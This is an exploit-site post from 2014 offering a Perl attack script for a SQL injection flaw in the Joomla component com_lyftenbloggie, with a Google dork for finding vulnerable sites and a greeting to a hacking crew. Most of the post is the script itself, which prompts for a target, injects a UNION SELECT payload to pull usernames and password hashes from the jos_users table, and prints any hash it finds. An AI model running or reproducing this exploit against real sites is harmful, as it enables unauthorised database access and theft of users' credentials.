facebook facebook twitter rss

Joomla Component com_lyftenbloggie SQL Injection exploit

Author: Hani Xavi , Published: 07-10-2014
#Exploit title: Joomla Component com_lyftenbloggie SQL Injection exploit 

#Exploit Author: Hani Xavi

#Google Dork: inurl:index.php?option=com_lyftenbloggie

Greetz To : All AnonGhost Team

Video : https://www.youtube.com/watch?v=0hhElShHiKM


#!/usr/bin/perl
#Exploit title: Joomla Component com_lyftenbloggie SQL Injection exploit
#Google Dork: inurl:index.php?option=com_lyftenbloggie
#Exploit Author: Hani Xavi

system("color a");
print "*********************************************\n";
print "* Joomla Component com_lyftenbloggie *\n";
print "* SQL Injection *\n";
print "* Coded by Hani Xavi *\n";
print "*********************************************\n";
sleep 1;
use LWP::UserAgent;
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$code="+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--;";
$agent = LWP::UserAgent->new() or die "[!] Error while processing";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$host= $target. "/index.php?option=com_lyftenbloggie==".$code;
$ok = $agent->request(HTTP::Request->new(GET=>$host));
$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n$2\n";
sleep 1;
}
else
{
print "Password not found \n";
}

Like us on Facebook :